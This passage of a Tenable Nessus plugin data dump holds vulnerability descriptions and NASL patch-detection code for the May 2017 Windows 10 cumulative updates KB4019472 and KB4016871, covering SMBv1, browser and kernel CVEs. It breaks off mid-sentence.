marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. 
(CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019472/windows-10-update-kb4019472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?038b505a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019472.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-05';\nkbs = make_list(4019472);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:30", "description": "The remote Windows 10 version 1703 host is missing security update KB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0224)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. 
An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. 
A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0223", "CVE-2017-0224", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0235", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": 
"2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_MAY_4016871.NASL", "href": "https://www.tenable.com/plugins/nessus/100055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100055);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0223\",\n \"CVE-2017-0224\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0235\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98214,\n 98217,\n 98222,\n 98229,\n 98230,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98452\n );\n script_xref(name:\"MSKB\", value:\"4016871\");\n script_xref(name:\"MSFT\", value:\"MS17-4016871\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. 
(CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0224)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. 
(CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute 